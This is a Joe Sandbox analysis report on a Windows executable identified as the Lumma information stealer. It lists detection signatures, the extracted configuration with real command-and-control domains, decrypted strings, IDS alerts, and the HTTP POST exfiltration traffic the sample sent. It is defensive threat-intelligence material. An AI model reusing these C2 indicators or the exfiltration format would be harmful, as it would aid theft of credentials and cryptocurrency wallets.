Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1545731
MD5:998c59d4bf9c18e798a6db77f7ce10f9
SHA1:4d3205af0bb4d029c3421be1eebce7271966b4c5
SHA256:e0d3da58a38b98b5d9ba1241fb1b30d7251332883b285117e6d2794af0c66394
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 2516 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 998C59D4BF9C18E798A6DB77F7CE10F9)
    • conhost.exe (PID: 6800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • file.exe (PID: 4088 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 998C59D4BF9C18E798A6DB77F7CE10F9)
    • WerFault.exe (PID: 3688 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2516 -s 152 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["seallysl.site", "contemteny.site", "goalyfeastz.site", "opposezmny.site", "forbidstow.site", "servicedny.site", "dilemmadu.site", "faulteyotk.site", "authorisev.site"], "Build id": "1NCW25--424"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000003.00000003.2118733198.0000000001379000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000003.2118075950.0000000001379000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000003.00000003.2130598412.0000000001379000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000003.00000003.2147992648.0000000001379000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000003.00000003.2149945390.000000000137B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 4 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-30T22:23:00.028830+010020546531A Network Trojan was detected192.168.2.549704104.21.41.39443TCP
              2024-10-30T22:23:01.444131+010020546531A Network Trojan was detected192.168.2.549706104.21.41.39443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-30T22:23:00.028830+010020498361A Network Trojan was detected192.168.2.549704104.21.41.39443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-30T22:23:01.444131+010020498121A Network Trojan was detected192.168.2.549706104.21.41.39443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-30T22:23:03.137386+010020480941Malware Command and Control Activity Detected192.168.2.549709104.21.41.39443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-30T22:23:08.621674+010028438641A Network Trojan was detected192.168.2.549716104.21.41.39443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 00000000.00000002.2279638953.0000000001183000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["seallysl.site", "contemteny.site", "goalyfeastz.site", "opposezmny.site", "forbidstow.site", "servicedny.site", "dilemmadu.site", "faulteyotk.site", "authorisev.site"], "Build id": "1NCW25--424"}
              Source: file.exeReversingLabs: Detection: 31%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
              Source: file.exeJoe Sandbox ML: detected
              Source: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: servicedny.site
              Source: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: authorisev.site
              Source: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: faulteyotk.site
              Source: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: dilemmadu.site
              Source: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: contemteny.site
              Source: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: goalyfeastz.site
              Source: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: opposezmny.site
              Source: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: seallysl.site
              Source: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: forbidstow.site
              Source: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: 1NCW25--424
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0041D5AF CryptUnprotectData,3_2_0041D5AF
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.41.39:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.41.39:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.41.39:443 -> 192.168.2.5:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.41.39:443 -> 192.168.2.5:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.41.39:443 -> 192.168.2.5:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.41.39:443 -> 192.168.2.5:49715 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.41.39:443 -> 192.168.2.5:49716 version: TLS 1.2
              Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD55BC FindFirstFileExW,0_2_00BD55BC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD566D FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00BD566D
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BD55BC FindFirstFileExW,3_2_00BD55BC
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BD566D FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00BD566D
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+5A603547h]3_2_00410130
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [ebx], dl3_2_00410130
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, byte ptr [ecx+eax-24F86745h]3_2_00410130
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, ecx3_2_00410130
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, ecx3_2_00410130
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx esi, byte ptr [eax]3_2_004441F0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, ecx3_2_0044137E
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, ecx3_2_004413D5
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax3_2_0041D5AF
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, eax3_2_0043A97E
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [eax+ebx*8], 7CDE1E50h3_2_0043A97E
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B62B8D10h3_2_0043A97E
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [ebx], cl3_2_0042EB60
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, eax3_2_0042EB60
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then lea edx, dword ptr [eax-80h]3_2_0042EB60
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [esi+ecx+0000009Ch]3_2_0042EB60
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+068F7B6Bh]3_2_0042EB60
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esi+04h], eax3_2_0042EB60
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_0042EB60
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [eax+ebx], 30303030h3_2_00401000
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [eax+ebx], 20202020h3_2_00401000
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B62B8D10h3_2_0043B170
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+5A603547h]3_2_00410118
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [ebx], dl3_2_00410118
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, byte ptr [ecx+eax-24F86745h]3_2_00410118
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, ecx3_2_00410118
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, ecx3_2_00410118
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp edx3_2_004431D0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then xor byte ptr [ecx+ebx], bl3_2_004431D0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-7DC9E524h]3_2_004241E0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp edx3_2_00442EB0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then xor byte ptr [ecx+ebx], bl3_2_00442EB0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp edx3_2_004432C0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then xor byte ptr [ecx+ebx], bl3_2_004432C0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [eax+ebx], 00000030h3_2_004012D5
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, ebx3_2_00421333
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx esi, byte ptr [eax]3_2_00444380
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp edx3_2_004433B0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then xor byte ptr [ecx+ebx], bl3_2_004433B0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h3_2_0042E400
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [esi+ecx+0000009Ch]3_2_0042F4DD
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+068F7B6Bh]3_2_0042F4DD
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esi+04h], eax3_2_0042F4DD
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_0042F4DD
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebx, eax3_2_0040D500
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [ebx], ax3_2_0041F510
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0041F510
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-67BC38F0h]3_2_00441648
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]3_2_0043C6D0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0041C6E0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+52B71DE2h]3_2_00441720
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then xor byte ptr [ecx+ebx], bl3_2_00443720
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, byte ptr [esp+ebx-09A22FB6h]3_2_0043F7E0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]3_2_0042E870
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, byte ptr [edi+ebx]3_2_00405820
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0041C8CE
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, eax3_2_0040E8D6
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [edx+esi]3_2_0040C960
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, eax3_2_0040E996
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax3_2_0042AA40
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+1817620Ch]3_2_0042AA60
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0042CA72
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0042CA72
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+2BB126CDh]3_2_0043FAD0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edi, edx3_2_00421B40
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp al, 2Eh3_2_0042AC04
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edi, esi3_2_0041ECDE
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_00437CA0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_0042DE70
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esp+3Ch], 595A5B84h3_2_00440E3A
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edi, dword ptr [esp+54h]3_2_0042CEDA
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp edx3_2_00442EB0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then xor byte ptr [ecx+ebx], bl3_2_00442EB0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h3_2_00425F00
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, word ptr [edx]3_2_00428F00

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49709 -> 104.21.41.39:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 104.21.41.39:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 104.21.41.39:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49706 -> 104.21.41.39:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49706 -> 104.21.41.39:443
              Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49716 -> 104.21.41.39:443
              Source: Malware configuration extractorURLs: seallysl.site
              Source: Malware configuration extractorURLs: contemteny.site
              Source: Malware configuration extractorURLs: goalyfeastz.site
              Source: Malware configuration extractorURLs: opposezmny.site
              Source: Malware configuration extractorURLs: forbidstow.site
              Source: Malware configuration extractorURLs: servicedny.site
              Source: Malware configuration extractorURLs: dilemmadu.site
              Source: Malware configuration extractorURLs: faulteyotk.site
              Source: Malware configuration extractorURLs: authorisev.site
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: forbidstow.site
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 45Host: forbidstow.site
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12833Host: forbidstow.site
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15075Host: forbidstow.site
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20565Host: forbidstow.site
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1272Host: forbidstow.site
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 568525Host: forbidstow.site
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: forbidstow.site
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: forbidstow.site
              Source: file.exe, 00000003.00000003.2131010744.000000000388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: file.exe, 00000003.00000003.2131010744.000000000388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: file.exe, 00000003.00000003.2131010744.000000000388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: file.exe, 00000003.00000003.2131010744.000000000388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: file.exe, 00000003.00000003.2131010744.000000000388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: file.exe, 00000003.00000003.2131010744.000000000388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: file.exe, 00000003.00000003.2131010744.000000000388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: file.exe, 00000003.00000003.2131010744.000000000388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: file.exe, 00000003.00000003.2131010744.000000000388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
              Source: file.exe, 00000003.00000003.2131010744.000000000388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: file.exe, 00000003.00000003.2131010744.000000000388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: file.exe, 00000003.00000003.2102801748.000000000389B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.2102843367.0000000003898000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.2102957593.0000000003898000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: file.exe, 00000003.00000003.2148108007.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.2147992648.000000000138D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
              Source: file.exe, 00000003.00000003.2148108007.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.2147992648.000000000138D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
              Source: file.exe, 00000003.00000003.2102801748.000000000389B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.2102843367.0000000003898000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.2102957593.0000000003898000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: file.exe, 00000003.00000003.2102801748.000000000389B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.2102843367.0000000003898000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.2102957593.0000000003898000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: file.exe, 00000003.00000003.2102801748.000000000389B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.2102843367.0000000003898000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.2102957593.0000000003898000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: file.exe, 00000003.00000003.2148108007.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.2147992648.000000000138D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: file.exe, 00000003.00000003.2148108007.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.2147992648.000000000138D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
              Source: file.exe, 00000003.00000003.2102801748.000000000389B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.2102843367.0000000003898000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.2102957593.0000000003898000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: file.exe, 00000003.00000003.2102801748.000000000389B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.2102843367.0000000003898000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.2102957593.0000000003898000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: file.exe, 00000003.00000003.2102801748.000000000389B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.2102843367.0000000003898000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.2102957593.0000000003898000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: file.exe, 00000003.00000003.2165424961.00000000013B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://forbidstow.site/
              Source: file.exe, 00000003.00000002.2192697514.0000000001316000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.2172599012.00000000013B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://forbidstow.site/api
              Source: file.exe, 00000003.00000003.2172599012.0000000001395000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://forbidstow.site/apiDw
              Source: file.exe, 00000003.00000003.2118075950.000000000138D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.2130598412.000000000138D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://forbidstow.site/apiY
              Source: file.exe, 00000003.00000003.2147992648.000000000138D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://forbidstow.site/apil
              Source: file.exe, 00000003.00000003.2130598412.000000000138D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://forbidstow.site/c
              Source: file.exe, 00000003.00000002.2192897295.000000000139C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.2172599012.0000000001395000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://forbidstow.site/e
              Source: file.exe, 00000003.00000002.2192897295.000000000139C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.2192697514.0000000001316000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://forbidstow.site/pi
